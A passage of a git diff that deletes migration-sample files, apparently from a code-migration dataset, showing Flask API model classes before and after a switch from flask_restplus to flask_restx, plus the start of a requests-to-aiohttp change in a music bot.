DataIntegrationConnectionFileCsvModel( - Id=target_connection.Id, - HasHeader=target_connection.File.Csv.HasHeader, - Header=target_connection.File.Csv.Header, - Separator=target_connection.File.Csv.Separator, - ) - target_file_csv = json.loads( - json.dumps(entity_target_file_csv.__dict__, default=CommonModels.date_converter)) - target_file['Csv'] = target_file_csv - target['File'] = target_file - if target_connection.Queue is not None: - entity_source_queue = DataIntegrationConnectionQueueModel( - Id=target_connection.Id, - TopicName=target_connection.Queue.TopicName, - ) - target_queue = json.loads(json.dumps(entity_source_queue.__dict__, default=CommonModels.date_converter)) - target['Queue'] = target_queue - target['Connection'] = ConnectionModels.get_connection_result_model(target_connection.Connection) - columns = [] - for col in data_integration.Columns: - entity_column = DataIntegrationColumnModel( - Id=col.Id, - ResourceType=col.ResourceType, - SourceColumnName=col.SourceColumnName, - TargetColumnName=col.TargetColumnName, - ) - column = json.loads(json.dumps(entity_column.__dict__, default=CommonModels.date_converter)) - columns.append(column) - entity_model = DataIntegrationModel( - Id=data_integration.Id, - Code=data_integration.Code, - IsTargetTruncate=data_integration.IsTargetTruncate, - IsDelta=data_integration.IsDelta, - CreationDate=data_integration.CreationDate, - Comments=data_integration.Comments, - IsDeleted=data_integration.IsDeleted - ) - - result_model = json.loads(json.dumps(entity_model.__dict__, default=CommonModels.date_converter)) - if source is not None: - result_model['SourceConnection'] = source - result_model['TargetConnection'] = target - result_model['Columns'] = columns - return result_model - - @staticmethod - def get_data_integration_models(data_integrations: List[DataIntegration]) -> List[DataIntegrationModel]: - - entities = [] - for data_integration in data_integrations: - if data_integration.IsDeleted == 0: - entity = DataIntegrationModels.get_data_integration_model(data_integration) - entities.append(entity) - return entities diff --git a/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$job$models$JobModels.py.diff b/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$job$models$JobModels.py.diff deleted file mode 100644 index 6be1ada..0000000 --- a/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$job$models$JobModels.py.diff +++ /dev/null @@ -1,13 +0,0 @@ -diff --git a/src/api/controllers/job/models/JobModels.py b/src/api/controllers/job/models/JobModels.py - index 4b218d2649130a1cce9bb48e838e9051996bbdef..598f275f11bdb1796b4ea0f6b3676a45758c08c4 100644 - --- a/src/api/controllers/job/models/JobModels.py - +++ b/src/api/controllers/job/models/JobModels.py -@@ -1,7 +1,7 @@ - import json - from typing import List - --from flask_restplus import fields -+from flask_restx import fields - - from controllers.common.models.CommonModels import EntityModel, CommonModels - from IocManager import IocManager diff --git a/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$job$models$JobModels.py.source.py b/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$job$models$JobModels.py.source.py deleted file mode 100644 index a40b1de..0000000 --- a/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$job$models$JobModels.py.source.py +++ /dev/null @@ -1,79 +0,0 @@ -import json -from typing import List - -from flask_restplus import fields - -from controllers.common.models.CommonModels import EntityModel, CommonModels -from IocManager import IocManager -from models.dao.aps.ApSchedulerJob import ApSchedulerJob -from models.dao.aps.ApSchedulerJobEvent import ApSchedulerJobEvent - - -class ApSchedulerJobModel(EntityModel): - __tablename__ = "ApSchedulerJob" - - def __init__(self, - JobId=None, - NextRunTime=None, - FuncRef=None, - IsDeleted=None, - *args, **kwargs): - super().__init__(*args, **kwargs) - self.JobId = JobId - self.NextRunTime = NextRunTime - self.FuncRef = FuncRef - self.IsDeleted = IsDeleted - - -class ApSchedulerJobEventModel(): - def __init__(self, - JobId=None, - EventId=None, - EventName=None, - *args, **kwargs): - super().__init__(*args, **kwargs) - self.JobId = JobId - self.EventId = EventId - self.EventName = EventName - - -class JobModels: - ns = IocManager.api.namespace('Job', description='Job scheduler endpoints', path='/api/Job') - - RemoveJobModel = IocManager.api.model('RemoveJob', { - 'JobId': fields.Integer(description='', required=True), - }) - - @staticmethod - def get_ap_scheduler_job_model(ap_scheduler_job: ApSchedulerJob) -> ApSchedulerJobModel: - result = ApSchedulerJobModel( - JobId=ap_scheduler_job.JobId, - NextRunTime=ap_scheduler_job.NextRunTime, - FuncRef=ap_scheduler_job.FuncRef, - Id=ap_scheduler_job.Id, - IsDeleted=ap_scheduler_job.IsDeleted, - ) - entity = json.loads(json.dumps(result.__dict__, default=CommonModels.date_converter)) - return entity - - @staticmethod - def get_ap_scheduler_job_models(ap_scheduler_jobs: List[ApSchedulerJob]) -> List[ApSchedulerJobModel]: - entities = [] - for ap_scheduler_job in ap_scheduler_jobs: - entity = JobModels.get_ap_scheduler_job_model(ap_scheduler_job) - entities.append(entity) - return entities - - @staticmethod - def get_ap_scheduler_job_events_model(ap_scheduler_job_events: List[ApSchedulerJobEvent]) -> List[ - ApSchedulerJobEventModel]: - entities = [] - for ap_scheduler_job_event in ap_scheduler_job_events: - result = ApSchedulerJobEventModel( - JobId=ap_scheduler_job_event.ApSchedulerJobId, - EventId=ap_scheduler_job_event.EventId, - EventName=ap_scheduler_job_event.ApSchedulerEvent.Name, - ) - entity = json.loads(json.dumps(result.__dict__, default=CommonModels.date_converter)) - entities.append(entity) - return entities diff --git a/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$job$models$JobModels.py.target.py b/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$job$models$JobModels.py.target.py deleted file mode 100644 index 743b6cb..0000000 --- a/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$job$models$JobModels.py.target.py +++ /dev/null @@ -1,79 +0,0 @@ -import json -from typing import List - -from flask_restx import fields - -from controllers.common.models.CommonModels import EntityModel, CommonModels -from IocManager import IocManager -from models.dao.aps.ApSchedulerJob import ApSchedulerJob -from models.dao.aps.ApSchedulerJobEvent import ApSchedulerJobEvent - - -class ApSchedulerJobModel(EntityModel): - __tablename__ = "ApSchedulerJob" - - def __init__(self, - JobId=None, - NextRunTime=None, - FuncRef=None, - IsDeleted=None, - *args, **kwargs): - super().__init__(*args, **kwargs) - self.JobId = JobId - self.NextRunTime = NextRunTime - self.FuncRef = FuncRef - self.IsDeleted = IsDeleted - - -class ApSchedulerJobEventModel(): - def __init__(self, - JobId=None, - EventId=None, - EventName=None, - *args, **kwargs): - super().__init__(*args, **kwargs) - self.JobId = JobId - self.EventId = EventId - self.EventName = EventName - - -class JobModels: - ns = IocManager.api.namespace('Job', description='Job scheduler endpoints', path='/api/Job') - - RemoveJobModel = IocManager.api.model('RemoveJob', { - 'JobId': fields.Integer(description='', required=True), - }) - - @staticmethod - def get_ap_scheduler_job_model(ap_scheduler_job: ApSchedulerJob) -> ApSchedulerJobModel: - result = ApSchedulerJobModel( - JobId=ap_scheduler_job.JobId, - NextRunTime=ap_scheduler_job.NextRunTime, - FuncRef=ap_scheduler_job.FuncRef, - Id=ap_scheduler_job.Id, - IsDeleted=ap_scheduler_job.IsDeleted, - ) - entity = json.loads(json.dumps(result.__dict__, default=CommonModels.date_converter)) - return entity - - @staticmethod - def get_ap_scheduler_job_models(ap_scheduler_jobs: List[ApSchedulerJob]) -> List[ApSchedulerJobModel]: - entities = [] - for ap_scheduler_job in ap_scheduler_jobs: - entity = JobModels.get_ap_scheduler_job_model(ap_scheduler_job) - entities.append(entity) - return entities - - @staticmethod - def get_ap_scheduler_job_events_model(ap_scheduler_job_events: List[ApSchedulerJobEvent]) -> List[ - ApSchedulerJobEventModel]: - entities = [] - for ap_scheduler_job_event in ap_scheduler_job_events: - result = ApSchedulerJobEventModel( - JobId=ap_scheduler_job_event.ApSchedulerJobId, - EventId=ap_scheduler_job_event.EventId, - EventName=ap_scheduler_job_event.ApSchedulerEvent.Name, - ) - entity = json.loads(json.dumps(result.__dict__, default=CommonModels.date_converter)) - entities.append(entity) - return entities diff --git a/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$operation$models$DataOperationModels.py.diff b/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$operation$models$DataOperationModels.py.diff deleted file mode 100644 index f7a184a..0000000 --- a/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$operation$models$DataOperationModels.py.diff +++ /dev/null @@ -1,13 +0,0 @@ -diff --git a/src/api/controllers/operation/models/DataOperationModels.py b/src/api/controllers/operation/models/DataOperationModels.py - index 4b218d2649130a1cce9bb48e838e9051996bbdef..598f275f11bdb1796b4ea0f6b3676a45758c08c4 100644 - --- a/src/api/controllers/operation/models/DataOperationModels.py - +++ b/src/api/controllers/operation/models/DataOperationModels.py -@@ -2,7 +2,7 @@ import json - from datetime import datetime - from typing import List - --from flask_restplus import fields -+from flask_restx import fields - - from controllers.common.models.CommonModels import EntityModel, CommonModels - from controllers.integration.models.DataIntegrationModels import DataIntegrationModels diff --git a/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$operation$models$DataOperationModels.py.source.py b/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$operation$models$DataOperationModels.py.source.py deleted file mode 100644 index 305e8bd..0000000 --- a/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$operation$models$DataOperationModels.py.source.py +++ /dev/null @@ -1,165 +0,0 @@ -import json -from datetime import datetime -from typing import List - -from flask_restplus import fields - -from controllers.common.models.CommonModels import EntityModel, CommonModels -from controllers.integration.models.DataIntegrationModels import DataIntegrationModels -from IocManager import IocManager -from models.dao.common.Log import Log -from models.dao.operation import DataOperation -from models.dao.operation.DataOperationContact import DataOperationContact - - -class DataOperationIntegrationModel(EntityModel): - - def __init__(self, - Order: int = None, - Limit: int = None, - ProcessCount: int = None, - Integration=None, - *args, **kwargs): - super().__init__(*args, **kwargs) - self.Order: int = Order - self.Limit: int = Limit - self.ProcessCount: int = ProcessCount - self.Integration = Integration - - -class DataOperationContactModel(EntityModel): - def __init__(self, - Email: str = None, - *args, **kwargs): - super().__init__(*args, **kwargs) - self.Email: str = Email - - -class DataOperationModel(EntityModel): - def __init__(self, - Id: int = None, - Name: str = None, - *args, **kwargs): - super().__init__(*args, **kwargs) - self.Id: int = Id - self.Name: str = Name - - -class DataIntegrationLogModel(): - - def __init__(self, - Id: int = None, - Type: str = None, - Content: str = None, - LogDatetime: datetime = None, - JobId: int = None, - *args, **kwargs): - super().__init__(*args, **kwargs) - self.Id = Id - self.Type = Type - self.Content = Content - self.LogDatetime = LogDatetime - self.JobId = JobId - - -class DataOperationModels: - ns = IocManager.api.namespace('DataOperation', description='Data Operation endpoints', - path='/api/DataOperation') - - operation_contact = IocManager.api.model('Data Operation Contact', { - 'Email': fields.String(description='Operation contact email', required=False), - }) - operation_integration = IocManager.api.model('Data Operation Integration', { - 'Limit': fields.Integer(description='Operation code value', required=False, example=10000), - 'ProcessCount': fields.Integer(description='Operation code value', required=True, example=1), - 'Integration': fields.Nested(DataIntegrationModels.data_integration_model, - description='Integration information', required=True) - }) - - create_data_operation_model = IocManager.api.model('CreateDataOperation', { - 'Name': fields.String(description='Data Operation Name', required=True), - 'Contacts': fields.List(fields.Nested(operation_contact), description='Contact Email list', - required=False), - 'Integrations': fields.List(fields.Nested(operation_integration), description='Integration code list', - required=True), - }) - - update_data_operation_model = IocManager.api.model('UpdateDataOperation', { - 'Name': fields.String(description='Data Operation Name', required=True), - 'Integrations': fields.List(fields.Nested(operation_integration), description='Integration code list', - required=True), - }) - - delete_data_operation_model = IocManager.api.model('DeleteDataOperationModel', { - 'Id': fields.Integer(description='Connection Database Id', required=True), - }) - - @staticmethod - def get_data_operation_contact_model(data_operation_contact: DataOperationContact) -> DataOperationContactModel: - - entity_model = DataOperationContactModel( - Email=data_operation_contact.Email, - ) - result_model = json.loads(json.dumps(entity_model.__dict__, default=CommonModels.date_converter)) - return result_model - - @staticmethod - def get_data_operation_contact_models(data_operation_contacts: List[DataOperationContact]) -> List[ - DataOperationContactModel]: - entities = [] - for data_operation_contact in data_operation_contacts: - if data_operation_contact.IsDeleted == 0: - entity = DataOperationModels.get_data_operation_contact_model(data_operation_contact) - entities.append(entity) - return entities - - @staticmethod - def get_data_operation_result_model(data_operation: DataOperation) -> DataOperationModel: - entity_model = DataOperationModel( - Id=data_operation.Id, - Name=data_operation.Name, - ) - result_model = json.loads(json.dumps(entity_model.__dict__, default=CommonModels.date_converter)) - integrations = [] - for data_operation_integration in data_operation.Integrations: - entity_model = DataOperationIntegrationModel( - Id=data_operation_integration.Id, - Order=data_operation_integration.Order, - Limit=data_operation_integration.Limit, - ProcessCount=data_operation_integration.ProcessCount, - ) - data_operation_integration_result_model = json.loads( - json.dumps(entity_model.__dict__, default=CommonModels.date_converter)) - integration = DataIntegrationModels.get_data_integration_model(data_operation_integration.DataIntegration) - data_operation_integration_result_model['Integration'] = integration - integrations.append(data_operation_integration_result_model) - contacts = DataOperationModels.get_data_operation_contact_models(data_operation.Contacts) - result_model['Contacts'] = contacts - result_model['Integrations'] = integrations - return result_model - - @staticmethod - def get_data_operation_result_models(data_operations: List[DataOperation]) -> List[DataOperationModel]: - entities = [] - for data_operation in data_operations: - if data_operation.IsDeleted == 0: - entity = DataOperationModels.get_data_operation_result_model(data_operation) - entities.append(entity) - return entities - - @staticmethod - def get_pdi_logs_model(logs: List[Log]) -> List[ - DataIntegrationLogModel]: - - entities = [] - for log in logs: - result = DataIntegrationLogModel( - Id=log.Id, - JobId=log.JobId, - Type='Info' if log.TypeId == 2 else 'Error', - Content=log.Content, - LogDatetime=log.LogDatetime, - ) - entity = json.loads(json.dumps(result.__dict__, default=CommonModels.date_converter)) - entities.append(entity) - return entities diff --git a/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$operation$models$DataOperationModels.py.target.py b/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$operation$models$DataOperationModels.py.target.py deleted file mode 100644 index b3d9e57..0000000 --- a/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$operation$models$DataOperationModels.py.target.py +++ /dev/null @@ -1,165 +0,0 @@ -import json -from datetime import datetime -from typing import List - -from flask_restx import fields - -from controllers.common.models.CommonModels import EntityModel, CommonModels -from controllers.integration.models.DataIntegrationModels import DataIntegrationModels -from IocManager import IocManager -from models.dao.common.Log import Log -from models.dao.operation import DataOperation -from models.dao.operation.DataOperationContact import DataOperationContact - - -class DataOperationIntegrationModel(EntityModel): - - def __init__(self, - Order: int = None, - Limit: int = None, - ProcessCount: int = None, - Integration=None, - *args, **kwargs): - super().__init__(*args, **kwargs) - self.Order: int = Order - self.Limit: int = Limit - self.ProcessCount: int = ProcessCount - self.Integration = Integration - - -class DataOperationContactModel(EntityModel): - def __init__(self, - Email: str = None, - *args, **kwargs): - super().__init__(*args, **kwargs) - self.Email: str = Email - - -class DataOperationModel(EntityModel): - def __init__(self, - Id: int = None, - Name: str = None, - *args, **kwargs): - super().__init__(*args, **kwargs) - self.Id: int = Id - self.Name: str = Name - - -class DataIntegrationLogModel(): - - def __init__(self, - Id: int = None, - Type: str = None, - Content: str = None, - LogDatetime: datetime = None, - JobId: int = None, - *args, **kwargs): - super().__init__(*args, **kwargs) - self.Id = Id - self.Type = Type - self.Content = Content - self.LogDatetime = LogDatetime - self.JobId = JobId - - -class DataOperationModels: - ns = IocManager.api.namespace('DataOperation', description='Data Operation endpoints', - path='/api/DataOperation') - - operation_contact = IocManager.api.model('Data Operation Contact', { - 'Email': fields.String(description='Operation contact email', required=False), - }) - operation_integration = IocManager.api.model('Data Operation Integration', { - 'Limit': fields.Integer(description='Operation code value', required=False, example=10000), - 'ProcessCount': fields.Integer(description='Operation code value', required=True, example=1), - 'Integration': fields.Nested(DataIntegrationModels.data_integration_model, - description='Integration information', required=True) - }) - - create_data_operation_model = IocManager.api.model('CreateDataOperation', { - 'Name': fields.String(description='Data Operation Name', required=True), - 'Contacts': fields.List(fields.Nested(operation_contact), description='Contact Email list', - required=False), - 'Integrations': fields.List(fields.Nested(operation_integration), description='Integration code list', - required=True), - }) - - update_data_operation_model = IocManager.api.model('UpdateDataOperation', { - 'Name': fields.String(description='Data Operation Name', required=True), - 'Integrations': fields.List(fields.Nested(operation_integration), description='Integration code list', - required=True), - }) - - delete_data_operation_model = IocManager.api.model('DeleteDataOperationModel', { - 'Id': fields.Integer(description='Connection Database Id', required=True), - }) - - @staticmethod - def get_data_operation_contact_model(data_operation_contact: DataOperationContact) -> DataOperationContactModel: - - entity_model = DataOperationContactModel( - Email=data_operation_contact.Email, - ) - result_model = json.loads(json.dumps(entity_model.__dict__, default=CommonModels.date_converter)) - return result_model - - @staticmethod - def get_data_operation_contact_models(data_operation_contacts: List[DataOperationContact]) -> List[ - DataOperationContactModel]: - entities = [] - for data_operation_contact in data_operation_contacts: - if data_operation_contact.IsDeleted == 0: - entity = DataOperationModels.get_data_operation_contact_model(data_operation_contact) - entities.append(entity) - return entities - - @staticmethod - def get_data_operation_result_model(data_operation: DataOperation) -> DataOperationModel: - entity_model = DataOperationModel( - Id=data_operation.Id, - Name=data_operation.Name, - ) - result_model = json.loads(json.dumps(entity_model.__dict__, default=CommonModels.date_converter)) - integrations = [] - for data_operation_integration in data_operation.Integrations: - entity_model = DataOperationIntegrationModel( - Id=data_operation_integration.Id, - Order=data_operation_integration.Order, - Limit=data_operation_integration.Limit, - ProcessCount=data_operation_integration.ProcessCount, - ) - data_operation_integration_result_model = json.loads( - json.dumps(entity_model.__dict__, default=CommonModels.date_converter)) - integration = DataIntegrationModels.get_data_integration_model(data_operation_integration.DataIntegration) - data_operation_integration_result_model['Integration'] = integration - integrations.append(data_operation_integration_result_model) - contacts = DataOperationModels.get_data_operation_contact_models(data_operation.Contacts) - result_model['Contacts'] = contacts - result_model['Integrations'] = integrations - return result_model - - @staticmethod - def get_data_operation_result_models(data_operations: List[DataOperation]) -> List[DataOperationModel]: - entities = [] - for data_operation in data_operations: - if data_operation.IsDeleted == 0: - entity = DataOperationModels.get_data_operation_result_model(data_operation) - entities.append(entity) - return entities - - @staticmethod - def get_pdi_logs_model(logs: List[Log]) -> List[ - DataIntegrationLogModel]: - - entities = [] - for log in logs: - result = DataIntegrationLogModel( - Id=log.Id, - JobId=log.JobId, - Type='Info' if log.TypeId == 2 else 'Error', - Content=log.Content, - LogDatetime=log.LogDatetime, - ) - entity = json.loads(json.dumps(result.__dict__, default=CommonModels.date_converter)) - entities.append(entity) - return entities diff --git a/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$operation$models$JobSchedulerModels.py.diff b/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$operation$models$JobSchedulerModels.py.diff deleted file mode 100644 index 4c29d32..0000000 --- a/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$operation$models$JobSchedulerModels.py.diff +++ /dev/null @@ -1,13 +0,0 @@ -diff --git a/src/api/controllers/operation/models/JobSchedulerModels.py b/src/api/controllers/operation/models/JobSchedulerModels.py - index 4b218d2649130a1cce9bb48e838e9051996bbdef..598f275f11bdb1796b4ea0f6b3676a45758c08c4 100644 - --- a/src/api/controllers/operation/models/JobSchedulerModels.py - +++ b/src/api/controllers/operation/models/JobSchedulerModels.py -@@ -2,7 +2,7 @@ import json - from datetime import datetime, timedelta - from typing import List - --from flask_restplus import fields -+from flask_restx import fields - - from controllers.common.models.CommonModels import EntityModel, CommonModels - from controllers.job.models.JobModels import JobModels diff --git a/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$operation$models$JobSchedulerModels.py.source.py b/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$operation$models$JobSchedulerModels.py.source.py deleted file mode 100644 index 7de95ab..0000000 --- a/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$operation$models$JobSchedulerModels.py.source.py +++ /dev/null @@ -1,91 +0,0 @@ -import json -from datetime import datetime, timedelta -from typing import List - -from flask_restplus import fields - -from controllers.common.models.CommonModels import EntityModel, CommonModels -from controllers.job.models.JobModels import JobModels -from controllers.operation.models.DataOperationModels import DataOperationModels -from IocManager import IocManager -from models.dao.operation import DataOperationJob - - -class DataOperationJobModel(EntityModel): - def __init__(self, - Id: int = None, - StartDate: datetime = None, - EndDate: datetime = None, - Cron: str = None, - DataOperationId: int = None, - ApSchedulerJobId: int = None, - DataIntegration=None, - ApSchedulerJob=None, - IsDeleted=None, - *args, **kwargs): - super().__init__(*args, **kwargs) - self.Id: int = Id - self.StartDate: datetime = StartDate - self.EndDate: datetime = EndDate - self.Cron: int = Cron - self.DataOperationId: int = DataOperationId - self.ApSchedulerJobId: int = ApSchedulerJobId - self.DataIntegration = DataIntegration - self.ApSchedulerJob = ApSchedulerJob - self.IsDeleted = IsDeleted - - -class JobSchedulerModels: - ns = IocManager.api.namespace('JobScheduler', description='Job Scheduler endpoints', - path='/api/JobScheduler') - - start_operation_model = IocManager.api.model('Schedule', { - 'OperationName': fields.String(description='Operation name', required=True), - 'RunDate': fields.DateTime( - description="Job run date.", required=True, - example=(datetime.now().strftime('%Y-%m-%dT%H:%M:%S.%f')[:-3] + 'Z')) - }) - - start_operation_with_cron_model = IocManager.api.model('ScheduleDataOperation', { - 'OperationName': fields.String(description='Data Operation Name', required=True), - 'Cron': fields.String(description="Job cron value. ", required=True, example='*/1 * * * *'), - 'StartDate': fields.DateTime( - description="Job start date. The start date for the job can be entered if necessary.", required=False, - example=(datetime.now().strftime('%Y-%m-%dT%H:%M:%S.%f')[:-3] + 'Z')), - 'EndDate': fields.DateTime( - description="Job End date. The end date for the job can be entered if necessary.", required=False, - example=(datetime.now() + timedelta(seconds=10)).strftime('%Y-%m-%dT%H:%M:%S.%f')[:-3] + 'Z'), - }) - delete_operation_job_model = IocManager.api.model('DeleteOperationJob', { - 'DataOperationJobId': fields.Integer(description='DataOperationJobId', required=True) - }) - delete_operation_cron_job_model = IocManager.api.model('DeleteOperationCronJob', { - 'DataOperationName': fields.String(description='Data Operation Name', required=True) - }) - - @staticmethod - def get_data_operation_job_model(data_operation_job: DataOperationJob) -> DataOperationJobModel: - entity_model = DataOperationJobModel( - Id=data_operation_job.Id, - Cron=data_operation_job.Cron, - StartDate=data_operation_job.StartDate, - EndDate=data_operation_job.EndDate, - DataOperationId=data_operation_job.DataOperationId, - ApSchedulerJobId=data_operation_job.ApSchedulerJobId, - IsDeleted=data_operation_job.IsDeleted, - ) - result_model = json.loads(json.dumps(entity_model.__dict__, default=CommonModels.date_converter)) - result_model['DataOperation'] = DataOperationModels.get_data_operation_result_model( - data_operation_job.DataOperation) - result_model['ApSchedulerJob'] = JobModels.get_ap_scheduler_job_model( - data_operation_job.ApSchedulerJob) - return result_model - - @staticmethod - def get_data_operation_job_models(data_operation_jobs: List[DataOperationJob]) -> List[ - DataOperationJobModel]: - entities = [] - for data_operation_job in data_operation_jobs: - entity = JobSchedulerModels.get_data_operation_job_model(data_operation_jobs) - entities.append(entity) - return entities diff --git a/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$operation$models$JobSchedulerModels.py.target.py b/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$operation$models$JobSchedulerModels.py.target.py deleted file mode 100644 index c1ee4f5..0000000 --- a/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$operation$models$JobSchedulerModels.py.target.py +++ /dev/null @@ -1,91 +0,0 @@ -import json -from datetime import datetime, timedelta -from typing import List - -from flask_restx import fields - -from controllers.common.models.CommonModels import EntityModel, CommonModels -from controllers.job.models.JobModels import JobModels -from controllers.operation.models.DataOperationModels import DataOperationModels -from IocManager import IocManager -from models.dao.operation import DataOperationJob - - -class DataOperationJobModel(EntityModel): - def __init__(self, - Id: int = None, - StartDate: datetime = None, - EndDate: datetime = None, - Cron: str = None, - DataOperationId: int = None, - ApSchedulerJobId: int = None, - DataIntegration=None, - ApSchedulerJob=None, - IsDeleted=None, - *args, **kwargs): - super().__init__(*args, **kwargs) - self.Id: int = Id - self.StartDate: datetime = StartDate - self.EndDate: datetime = EndDate - self.Cron: int = Cron - self.DataOperationId: int = DataOperationId - self.ApSchedulerJobId: int = ApSchedulerJobId - self.DataIntegration = DataIntegration - self.ApSchedulerJob = ApSchedulerJob - self.IsDeleted = IsDeleted - - -class JobSchedulerModels: - ns = IocManager.api.namespace('JobScheduler', description='Job Scheduler endpoints', - path='/api/JobScheduler') - - start_operation_model = IocManager.api.model('Schedule', { - 'OperationName': fields.String(description='Operation name', required=True), - 'RunDate': fields.DateTime( - description="Job run date.", required=True, - example=(datetime.now().strftime('%Y-%m-%dT%H:%M:%S.%f')[:-3] + 'Z')) - }) - - start_operation_with_cron_model = IocManager.api.model('ScheduleDataOperation', { - 'OperationName': fields.String(description='Data Operation Name', required=True), - 'Cron': fields.String(description="Job cron value. ", required=True, example='*/1 * * * *'), - 'StartDate': fields.DateTime( - description="Job start date. The start date for the job can be entered if necessary.", required=False, - example=(datetime.now().strftime('%Y-%m-%dT%H:%M:%S.%f')[:-3] + 'Z')), - 'EndDate': fields.DateTime( - description="Job End date. The end date for the job can be entered if necessary.", required=False, - example=(datetime.now() + timedelta(seconds=10)).strftime('%Y-%m-%dT%H:%M:%S.%f')[:-3] + 'Z'), - }) - delete_operation_job_model = IocManager.api.model('DeleteOperationJob', { - 'DataOperationJobId': fields.Integer(description='DataOperationJobId', required=True) - }) - delete_operation_cron_job_model = IocManager.api.model('DeleteOperationCronJob', { - 'DataOperationName': fields.String(description='Data Operation Name', required=True) - }) - - @staticmethod - def get_data_operation_job_model(data_operation_job: DataOperationJob) -> DataOperationJobModel: - entity_model = DataOperationJobModel( - Id=data_operation_job.Id, - Cron=data_operation_job.Cron, - StartDate=data_operation_job.StartDate, - EndDate=data_operation_job.EndDate, - DataOperationId=data_operation_job.DataOperationId, - ApSchedulerJobId=data_operation_job.ApSchedulerJobId, - IsDeleted=data_operation_job.IsDeleted, - ) - result_model = json.loads(json.dumps(entity_model.__dict__, default=CommonModels.date_converter)) - result_model['DataOperation'] = DataOperationModels.get_data_operation_result_model( - data_operation_job.DataOperation) - result_model['ApSchedulerJob'] = JobModels.get_ap_scheduler_job_model( - data_operation_job.ApSchedulerJob) - return result_model - - @staticmethod - def get_data_operation_job_models(data_operation_jobs: List[DataOperationJob]) -> List[ - DataOperationJobModel]: - entities = [] - for data_operation_job in data_operation_jobs: - entity = JobSchedulerModels.get_data_operation_job_model(data_operation_jobs) - entities.append(entity) - return entities diff --git a/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$infrastructor$api$ResourceBase.py.diff b/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$infrastructor$api$ResourceBase.py.diff deleted file mode 100644 index 2885bdd..0000000 --- a/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$infrastructor$api$ResourceBase.py.diff +++ /dev/null @@ -1,10 +0,0 @@ -diff --git a/src/api/infrastructor/api/ResourceBase.py b/src/api/infrastructor/api/ResourceBase.py - index 4b218d2649130a1cce9bb48e838e9051996bbdef..598f275f11bdb1796b4ea0f6b3676a45758c08c4 100644 - --- a/src/api/infrastructor/api/ResourceBase.py - +++ b/src/api/infrastructor/api/ResourceBase.py -@@ -1,4 +1,4 @@ --from flask_restplus import Resource -+from flask_restx import Resource - - - class ResourceBase(Resource): diff --git a/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$infrastructor$api$ResourceBase.py.source.py b/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$infrastructor$api$ResourceBase.py.source.py deleted file mode 100644 index 0dcbb3f..0000000 --- a/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$infrastructor$api$ResourceBase.py.source.py +++ /dev/null @@ -1,5 +0,0 @@ -from flask_restplus import Resource - - -class ResourceBase(Resource): - pass diff --git a/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$infrastructor$api$ResourceBase.py.target.py b/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$infrastructor$api$ResourceBase.py.target.py deleted file mode 100644 index 0c1af92..0000000 --- a/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$infrastructor$api$ResourceBase.py.target.py +++ /dev/null @@ -1,5 +0,0 @@ -from flask_restx import Resource - - -class ResourceBase(Resource): - pass diff --git a/v1/data/codefile/raptor123471@dingolingo__1d8923a__musicbot$linkutils.py.diff b/v1/data/codefile/raptor123471@dingolingo__1d8923a__musicbot$linkutils.py.diff deleted file mode 100644 index b175978..0000000 --- a/v1/data/codefile/raptor123471@dingolingo__1d8923a__musicbot$linkutils.py.diff +++ /dev/null @@ -1,89 +0,0 @@ -diff --git a/musicbot/linkutils.py b/musicbot/linkutils.py - index 7f240327378e1aab157aed6ee9185674c15926ad..1d8923abae93915ad877774e0fdc812d6c53a70b 100644 - --- a/musicbot/linkutils.py - +++ b/musicbot/linkutils.py -@@ -1,4 +1,4 @@ --import requests -+import aiohttp - import re - from bs4 import BeautifulSoup - from enum import Enum -@@ -15,6 +15,9 @@ try: - except: - api = False - -+url_regex = re.compile( -+ "http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+") -+ - - def clean_sclink(track): - if track.startswith("https://m."): -@@ -24,16 +27,17 @@ def clean_sclink(track): - return track - - --def convert_spotify(url): -- regex = re.compile( -- "http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+") -+async def convert_spotify(url): - 